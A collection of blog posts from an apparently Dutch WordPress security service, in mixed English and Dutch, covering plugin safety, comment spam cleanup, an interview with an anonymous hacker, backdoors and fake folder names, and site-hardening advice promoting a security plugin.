Is my premium plugin safe?

/0 Comments/in

A brief explanation about premium plugins

Premium plugins require a one-time or annual payment. With the cost involved, one might expect these plugins to be more secure.

However, it all depends on the mindset of the plugin’s developer. Some invest significant effort in securing the plugin, while others focus solely on development to maximize profits.

Therefore, a premium plugin is not necessarily safer than a free-to-download plugin.

One disadvantage of premium plugins is that hackers dedicate more time to finding vulnerabilities in such plugins. They know that websites using paid plugins are often business websites or other important websites, as they have been invested in.

Hackers’ goal is not to take down the website but rather to send spam or place advertisements (link building and traffic) using the domain.

Important tips when using premium plugins

  • Purchase them legally; downloading illegal versions for free often includes hacks and backdoors for hackers.
  • Regularly update the plugin to the latest version.
  • Ensure that updates and licenses do not expire after one year if it restricts your ability to update the plugin.

 

Delete comment spam in WordPress

/0 Comments/in

What is comment spam?

Comment spam is the term used for unwanted comments on your blog. These comments are usually unrelated to the topic and often contain links to products on other websites.

Delete all comment spam at once

All comments are stored in a database, and this plugin clears your entire comment table in the database with just one click.

Note: You will lose ALL comments at once.

Selectively remove spam comments without plugins

You can adjust the display of the number of comments in your admin panel. Click on “Screen Options” when you are in the comments section of your WordPress admin and set the number displayed to 50 or 100.

manage comments

Then you can select all messages (at once) and deselect the comments you want to keep. This depends on the ratio of spam to the number of messages you want to keep.

select all comments

Prevent comment spam via WordPress settings

WordPress has a settings page for comments where you can set a higher threshold for posting comments. For example, you can set to mark any comment with more than 1 link as spam or require users to register before commenting.

WordPress comment settings

Plugins to stop comment spam

There are several plugins that can help prevent comment spam, such as Akismet, which is already included with every WordPress installation.

iThemes Security PRO NL also has a good feature to effectively stop comment spam. The PRO version has a reCAPTCHA option, allowing you to add a captcha requirement to the comment form.

Additionally, you can use reCAPTCHA for new registrations and the login panel.

Important!

Never click on a link in a comment when you are logged in!

As an administrator, you have certain rights to make changes in WordPress, and hackers know that. There are JavaScript codes/links that execute certain actions in the background when clicked!

Solving comment spam, contact spam via phpMyAdmin

There is another way to remove spam using phpMyAdmin, which is very effective, and you can be selective for comments with different statuses.

First, make a backup of your database!!

Delete all approved comments:
 DELETE from wp_comments WHERE comment_approved = '1'
Delete all pending comments:
 DELETE from wp_comments WHERE comment_approved = '0'
Delete all marked as spam comments:
 DELETE from wp_comments WHERE comment_approved = 'spam'
Delete all comments in the trash:
 DELETE from wp_comments WHERE comment_approved = 'trash'

 

If you need assistance in solving spam problems, whether preventive or if your own website is sending spam, contact us.

Interview with a hacker, “hacking for fun”

/0 Comments/in

This is an interview with a hacker who has been active in hacking websites and applications for several years. The hacker wishes to remain anonymous, and we will therefore not mention any name.

How did you start hacking?

It all began years ago when I was 16. I read about taking over someone’s Windows PC to play pranks like opening and closing the CD-ROM drive remotely. Then I learned about shutting down the PC, which also seemed fun. But it quickly became boring as I couldn’t see the person’s reaction. Also, back then, there weren’t as many laptops, and most of them didn’t have webcams, which I would have liked to see at that moment.

That sounds relatively harmless, but I understand you have been involved in other activities in recent years.

Yes, the feeling of having power over someone or “breaking in” was quite addictive. Eventually, I started sending keyloggers via email, allowing me to receive weekly emails with everything they typed. But even that became dull, as there wasn’t much interesting stuff to read.

And then you started hacking websites?

Well, not directly, as it was quite challenging to learn, and everything online changed so fast. It actually started with an acquaintance who had a website. Just for fun, I tried some login credentials, and he used his own name as the user and password, which he used everywhere, even for games, etc.

So, just for fun, I changed a few words on the website.

With someone you knew personally?

Yes, just for fun, harmless… I only changed a few words, giving the information a different twist.

How did you progress to the point where you started seriously intruding into other people’s websites, I assume strangers?

Well, intrusion… I’d say they left the backdoor of their website wide open, and I just walked in. And they weren’t strangers because the first websites I started hacking belonged to people I didn’t really like. My former employer and a few individuals who deserved it. I mean, it’s still quite decent, right? I didn’t physically harm them but just took them down a peg.

I only modified their websites. I deleted all the pages and uploaded my own page with a nice picture.

It’s really that simple once you’re inside the server.

Aren’t you afraid they might catch on or report you to the authorities?

They have to find me first. I have a way to be “invisible” on the internet without leaving my IP address, etc.

Are you still very active? Should I think about one website per week, per month, or…?

No, not at all. Occasionally, when I have free time, I turn on some hacking software and try to get into a website. Sometimes, I even email them. I politely tell them they have a vulnerability and how to fix it. But most of the time, I don’t get paid for it, even though I provide my Bitcoin address. Not even a tip for the effort, so it’s more fun to hack a well-known or popular website and mess around with it.

Thank you for the interview.

You’re welcome. It’s also nice to share sometimes. Most of what happens on the internet is anonymous because I prefer to keep everything private from acquaintances. They usually wouldn’t understand anyway.

Knowledge and experience takes years

/0 Comments/in

I often encounter programmers who have a hack on their website or their client’s site and then search on Google for how to remove that hack. They supplement their programming knowledge and try to restore and secure the site with that information.

However, no matter how much they read and apply from the internet, the hacks keep coming back.

This makes me think that knowledge and experience take years to build.

And I experienced this…

When I was young, I had a vintage bike, a manual moped. It didn’t run properly and couldn’t reach the expected speed. I did a lot of research on the internet and worked on it extensively, but nothing seemed to solve the problem.

During one of the test rides, an old man in his 80s, hunched over, shouted, “Your mixture is too rich, you’re burning too much oil.”

I said, “No, it’s fine, I know what’s in the tank!”

The old man said, “I can hear that it’s running too rich. You should put less oil in your fuel.

Later, it turned out that the wrong mixture had been added to the tank, which wasn’t suitable for that specific type of moped. (There was still a separate oil reservoir on the moped that required a small amount of oil, allowing it to run on different fuel.)

Various people around me (including the previous owner of the moped) couldn’t figure it out, but this man heard it from the sound of the engine!

That is knowledge and experience!

Waarom EVEN EEN HACK VERWIJDEREN niet realistisch is

/0 Comments/in

Ik hoor het iedere maand wel 1x: ,,kijk even op de server of je wat tegenkomt en verwijder HET dan”.

Dit is zelfs een vaak toegepaste strategie van webbouwers, die neuzen door de server heen, verwijderen wat en gaan er dan vanuit dat de hack wel weg is.

Is het vreemd om te denken dat een hack 1,2 of 3 bestanden bestaat?

Denken dat de hack uit enkele bestanden bestaat is niet eens zo heel gek. Ik begrijp het idee!

Helaas werken kwaadaardige hackers erg fanatiek aan een lek, een hackscript of stuk malware.
Onderdeel van hun hackscript is vaak lijn code die naar de hoofdmap verwijst, en malware plaats in iedere onderliggende map.

Een extra kopietje van het script, kost niets extra hé!
De server werkt wel..

Hacks boven de PUBLIC_HTML?

Ja mensen, het is mij ook overkomen voordat ik met een checklist ging werken. Ik maakte de website 10x schoon, brandschoon. Alles IN de public_html, httpdocs.
Maar die ratten zetten de malware helaas ook boven de public_html als daar schrijfrechten zijn.

Och, die paar mapjes in een WordPress website.. toch?

Je verbaast je misschien, want een standaard WordPress installatie.. waar de plugins en thema’s nog bijkomen bevat al meer dan 3000 bestanden en 307 mappen!!

Huh waar dan? Nou, ga maar na, de hoofdmap waar WordPress in staat begin je al met 3 mappen:
wp-admin + wp-content + wp-includes
> wp-content > plugins / themes / upgrade / languages
> Uploads / jaartallen / maanden /

12 mappen per jaar, doe dat eens 6 jaar lang.. 72 mappen! Alleen al in de uploads map.

EEN GIGA VERSTOPRUIMTE dus. En er hoeft maar 1 mapje te zijn met een actief stuk code waardoor hackers zo naar binnen blijven lopen. De zogenoemde backdoor.

Backdoors – Klein, vals, maar een GROOT gevaar!

Even vertaald, de achterdeurtjes.
Die maken nieuwe WordPress administratoren aan, geven belangrijke data door aan hackers. Ze maken letterlijk alles mogelijk!
En zo’n backdoor, dat hoeft maar 5 regels code te zijn in een bestandje.. of wanneer je het in base64 opbouwt.. 1 regel code. (code hieronder ter voorbeeld, deel van een backdoor)

In de meest brutale backdoors komen we zelfs telegram bots tegen, die sturen de nieuwe gegevens van klanten, aankopen en admins direct door. Waardeloos!

Hackers-truc: valse mapnamen

Je moet niet verbaasd zijn als je mappen tegenkomt die er niet horen, maar wel heel legitiem lijken.
Zelfbedachte mappen (niet te verwarren met zelfbedachte moppen) die sprekend lijken op legitieme mappen, en ook nog eens leeg lijken te zijn of gevuld met de “juiste” bestanden..
> root
> index
> uplaods / 2023
> wp-apmin

valse mapnamen

Daar moet goed naar gekeken worden. Even met de muis langs alle mappen neuzen en “wat” deleten werkt niet.

101 andere trucs

Er zijn zoveel trucs, en ik zie wekelijks nieuwe voorbij komen. Backdoors, fishing, spamming, datadiefstal…
Hopelijk begrijp je nu wel dat “EVEN door de bestanden lopen en verwijderen wat je tegenkomt” geen optie is.
In ieder geval, geen goede optie!

Je website hack-vrij laten maken

Heb je een WordPress website: klein, groot, zakelijk, webshop die je VOLLEDIG hack-vrij wilt laten maken?
Dat kan! Dat doen wij.

Meldt je website aan voor hack-herstel

WordPress security – The pyramid

/0 Comments/in

WordPress Security is like a Pyramid

the pyramid of WordPress security

The Base is WordPress
At the top of the pyramid, it all begins with the programmer/designer who sets up your WordPress website.

Securing Just One Part is Useless!

Focusing on one aspect, such as having a good programmer/designer, secure passwords, or the latest updates, won’t be enough. As you can see from the pyramid, it’s just one part of the whole.

A Truly Secure WordPress Website

To achieve a genuinely secure WordPress website, you need to secure all aspects.

We will help you, step by step, to make each part of the pyramid secure so that your WordPress website is truly protected!

  • The Programmer/Designer
  • The Theme
  • The Plugins
  • The Hosting
  • The User
  • WordPress Itself

The Programmer/Designer

A good WordPress website developer will use no more than 8-10 plugins. Each additional plugin is an opportunity for hackers, as not all plugin developers are experts in security.

This is where knowledge comes into play; the programmer/designer needs to be aware of the risks associated with each additional plugin and should consider coding certain features instead of relying on plugins.

However, bear in mind that a programmer/designer may take longer to create functions without using plugins, so the budget may need to increase! You can’t expect a programmer to build a fully functional website for a small amount (150-300) and also ensure top-notch security. (Also, not every programmer who charges a lot of money is necessarily good!!)

The Theme

Whether it’s premium or free, it doesn’t matter.

Really?

Premium themes are more frequently targeted by hackers because they prefer to hack sites that involve money. Premium plugins are commonly used, and hackers know that.

In short, being premium is not a guarantee. Do some research to see if the theme is listed in this database.

The Plugins

As shown in the pyramid, plugins play a significant role in the website’s security, with more than 36.3% of the website’s security depending on them.
Plugins are “third-party made,” which means they are developed by individuals in their basement or by teams launching a plugin.

Do you know who made your plugin? And do they have expertise in security?

There are 44,273 plugins available for free download on WordPress.org.

This is a fantastic offering! Plugins such as:

These are excellent plugins that can transform WordPress into an online shop or marketing machine!

However, once they gain popularity, hackers download the plugins and search for vulnerabilities. Once found, they create a script that scans websites for the presence of the targeted plugin and then executes a script to fill your website with ads, advertising the hacker’s products. Often, these products are related to Viagra, as it apparently sells well??

The Hosting

Hosting is where your website resides. This is known as a “data center.”

Sounds cool, and it is. High-tech computers are running to serve your website.

Well, high-tech… they are actually expensive stripped-down computers!
Powerful processors and ample storage ensure that websites are served quickly when a visitor requests them.

What is the host’s responsibility?

The host must ensure that the server software is up to date. The websites are displayed via a computer running Linux or Windows, and these should not get infected/hacked. This rarely happens, which is why this accounts for only 9.09% in the pyramid.

What does a good host do?

A good host wants to keep their high-tech computers fast, meaning they ensure that websites are being visited while hacker scripts are not active. Sometimes, a hosting company might ask you to keep all WordPress plugins up to date.

Or they might even take your WordPress website offline!

If your website is busy sending spam or launching attacks on other servers/computers of the host, they may take your website offline to stop this disruptive behavior.

The User

wordpress user you

What You, as a User, Can Do

  • Keep your plugins, theme, and WordPress up to date
  • Choose passwords that are not easy to guess
  • Don’t leave unnecessary plugins or themes on the server
  • Avoid clicking on links while logged in as the website’s administrator

WordPress Itself

The developers behind WordPress, who continue to offer it for free, are very active. They release new WordPress updates on a monthly, and sometimes even more frequent, basis to address new hacker tricks.

WordPress itself is a good and stable system! It was launched in May 2003 and has been in development for over 10 years.

Did You Know?

There is a Dutch security plugin that takes care of 80% of these aspects for you!

iThemes Security PRO NL

This plugin helps you set up

the server/hosting, enforces the use of strong passwords, keeps hackers out, secures directories, stops brute force attacks, secures your admin area, and provides an overview and control over your website!

Please note that some Dutch words/phrases (e.g., programmer, theme, plugins, hosting, user, WordPress) have been left untranslated for context and clarity.

My WordPress website shows another website!?!!

/0 Comments/in

Als je WordPress-website ineens verwijst naar een andere website, kan dit betekenen dat je website gehackt is. Hackers kunnen scripts gebruiken om je website aan te passen en door te verwijzen naar hun eigen website, wat kan leiden tot ongewenste reclame of andere schadelijke activiteiten. Het is essentieel om snel actie te ondernemen als je dit probleem opmerkt.

De website van de hacker

De website van de hacker wordt vaak gebruikt om geld te verdienen. Ze kunnen producten verkopen of andere frauduleuze activiteiten uitvoeren om winst te maken. Het is belangrijk om te voorkomen dat je website wordt gebruikt als een platform voor de activiteiten van de hacker.

Hou deze hackers buiten je website

Het is van cruciaal belang om ervoor te zorgen dat hackers geen toegang krijgen tot je website. Hoewel WordPress zelf over het algemeen veilig is, kunnen kwetsbaarheden in plugins een opening bieden voor hackers. Het is daarom belangrijk om je website goed te beveiligen.

Bescherm je WordPress website

Het gebruik van een betrouwbare beveiligingsplugin is een van de beste manieren om je WordPress-website te beschermen tegen hackers. Een antivirus- en beveiligingsplugin zoals iThemes Security PRO kan je helpen je website te beveiligen door verschillende functies, zoals het verbergen van het admin-gedeelte, het blokkeren van herhaalde pogingen, het beheren van veilige wachtwoorden en het maken van backups van je database.

Enkele functies van iThemes Security PRO:

– Het verbergen van het admin-gedeelte van je website om het moeilijker te maken voor hackers om toegang te krijgen.
– Het beveiligen van kwetsbare bestanden op de server, zodat hackers er geen toegang toe hebben.
– Het blokkeren van herhaalde pogingen om in te loggen, om brute force-aanvallen te voorkomen.
– Het afdwingen van het gebruik van sterke wachtwoorden om de beveiliging te verbeteren.
– Het maken van backups van je database, zodat je je website kunt herstellen als er iets misgaat.
– Het bijhouden van bestandswijzigingen, zodat je eventuele verdachte activiteiten kunt opsporen.
– Het informeren van jou over eventuele aanpassingen in je website, zodat je snel kunt reageren op verdachte activiteiten.

Het is belangrijk om regelmatig je beveiligingsinstellingen te controleren en ervoor te zorgen dat je WordPress-website up-to-date is om de beste bescherming te bieden tegen hackers. Met de juiste beveiligingsmaatregelen kun je de kans op een gehackte website aanzienlijk verkleinen en de veiligheid van je bezoekers en gegevens waarborgen.

Hacked content detected, now what?

/0 Comments/in

Als je een bericht van Google ontvangt waarin staat dat er gehackte inhoud is gedetecteerd op je WordPress-site, kan dat inderdaad erg vervelend zijn. Hier zijn enkele antwoorden op de vragen die je mogelijk hebt:

Hoe komt het dat de website plotseling gehackt is?

Een van de meest voorkomende oorzaken van een gehackte website is een kwetsbare plugin of thema. In ongeveer 15% van de gevallen is WordPress zelf de boosdoener, maar dat gebeurt meestal alleen als je WordPress al langer dan 1-3 jaar niet hebt bijgewerkt. Hackers testen plugins om kwetsbaarheden te vinden waarmee ze kunnen inbreken op WordPress-websites. Zodra ze een lek vinden, verspreiden ze een script op internet dat zoekt naar alle websites met die specifieke plugin, waarna ze hun injectie uitvoeren. Deze injectie kan bestaan uit kwaadaardige code waarmee ze reclame kunnen maken via jouw website, wat vaak wordt gezien als ongewenste reclame of phishing door Google.

Wat kan ik doen om de website weer te herstellen nadat er gehackte inhoud gedetecteerd is?

De gemakkelijkste en meest betrouwbare manier om je website te herstellen en te beveiligen is door een gespecialiseerd bedrijf zoals WPbeveiligen in te huren. Zij hebben ervaring in het herstellen en beveiligen van WordPress-websites en kunnen je site weer veilig maken. Als je WPbeveiligen inschakelt, krijg je vaak ook garanties op het herstelproces, wat voor extra gemoedsrust zorgt.

Als je echter zelf je WordPress-website wilt herstellen, zijn hier enkele basisstappen:

1. Gebruik de gratis scanner van Sucuri om te achterhalen waar de gehackte bestanden zich bevinden.
2. Maak een volledige backup van je website, inclusief alle bestanden en de database.
3. Verwijder de gehackte bestanden en kwaadaardige code. Let op dat deze code vaak geëncodeerd kan zijn om ontdekking te voorkomen.
4. Update alle plugins, WordPress zelf en waar mogelijk ook het thema naar de nieuwste versies.
5. Beveilig je WordPress-website met een goede antivirusplugin specifiek voor WordPress.

Houd er rekening mee dat het herstellen van een gehackte website een complex proces kan zijn en dat er mogelijk meer stappen nodig zijn dan hierboven beschreven. Het is altijd verstandig om een expert in te schakelen als je niet zeker weet wat je doet.

Hoe voorkom ik de melding van Google dat er gehackte inhoud gedetecteerd is?

Om te voorkomen dat Google gehackte inhoud detecteert op je website, kun je de volgende maatregelen nemen:

1. Gebruik een goede antivirusplugin specifiek voor WordPress om potentiële bedreigingen te detecteren en te blokkeren.
2. Verwijder ongebruikte plugins en thema’s van je server.
3. Beperk het aantal geïnstalleerde plugins tot een minimum en houd ze up-to-date.
4. Regelmatige updates van WordPress, plugins en thema’s zijn essentieel. Maak altijd een backup voordat je updates uitvoert.
5. Controleer of je hostingprovider goede beveiligingsmaatregelen heeft om aanvallen tegen te houden en de gegevens van websites van elkaar te scheiden. Dit is vooral belangrijk in gedeelde hostingomgevingen.

Door proactief te zijn en goede beveiligingspraktijken te volgen, kun je de kans op een gehackte website aanzienlijk verkleinen.

WordPress install

/0 Comments/in

Installing WordPress requires a hosting package with at least 1000 MB of disk space to accommodate WordPress and future content like text and images. The hosting package should also include a database, which is often provided by default with the hosting plan. When you order a hosting package, you’ll receive an email containing certain details:

1. FTP (File Transfer Protocol) details: These credentials give you access to the server where you will place WordPress in step 3. They usually include a Hostname (e.g., ftp.example.com), Username (e.g., example_user), and Password (e.g., &Y#HLlk214h). You’ll use these details in an FTP program like Filezilla to upload WordPress to the server.

2. MySQL database details: These credentials are used during the WordPress installation in step 4. They typically include the Database name (e.g., example_dbname), Database username (e.g., example_uname), and Password (e.g., &Y#HLlk214h).

Once you have a hosting package, you can proceed with the following steps:

Step 1. Download WordPress: You can download WordPress for free from WordPress.org. After downloading, extract the files using a ZIP or WINRAR program.

Step 2. Place WordPress on the server: Use the FTP credentials to connect to the server using an FTP program like Filezilla. Once connected, navigate to the “WWW” or “HTTPDOCS” folder (often referred to as the root of your site) and upload the files you extracted in Step 1.

Step 3. Link WordPress to the database: Access your domain in a web browser to initiate the WordPress installation. During this process, you’ll be asked to provide the MySQL database details, such as Database name, Database username, and Password. The Database host is usually “localhost,” but you can find a specific address in the email containing your hosting information. For added security, consider changing the table prefix during installation.

Step 4. You’re done! After completing the installation, you can access the WordPress admin panel by going to www.your-website-address.nl/wp-admin. Enter the username and password you chose during installation to access the WordPress admin, where you can manage your WordPress website.

It’s important to note that while WordPress is a robust system, its popularity and free accessibility make it a target for hackers. To enhance website security, consider using a reliable WordPress security plugin, which can address over 100 known vulnerabilities and make it more difficult for hackers to exploit your website.

Statistieken over de veiligheid van websites

/0 Comments/in

With over 1 trillion websites (1,000,000,000,000!!), the internet is indeed a massive market for both website visitors and hackers. Cybercriminals see the potential to infect even a small percentage of websites with their own advertisements, which could yield significant results. WordPress, Joomla, and Magento, being popular content management systems, are particularly attractive targets for hackers, given that one-third of all websites are built on these platforms.

Sucuri’s report indicates a significant increase in cybercrime in recent years. However, the success of hackers in mass hacking websites largely depends on how websites are managed and secured.

While WordPress receives frequent updates and security enhancements from its developers, plugins remain a weak link in the security chain. Plugins with Cross-Site Scripting (XSS) vulnerabilities can leave websites exposed to injections and attacks. Popular plugins like Revslider, Gravityforms, and Timthumb, while powerful, are sometimes not updated frequently enough by users, making them susceptible to exploitation.

The most common issues seen in hacked websites include backdoors, malware distribution, SEO spam, unauthorized email sending, and website defacement. These problems can seriously harm a website’s reputation and compromise its functionality.

To defend against hackers, it’s not enough to rely solely on timely updates. The use of an effective antivirus plugin for WordPress that closes over 100 known vulnerabilities and intercepts hacker methods becomes crucial to prevent the website from becoming an easy target.

For further protection and more tips on securing your WordPress website, you can explore the article ‘Serieus, je moet je WordPress website nu echt beveiligen’ (in Dutch).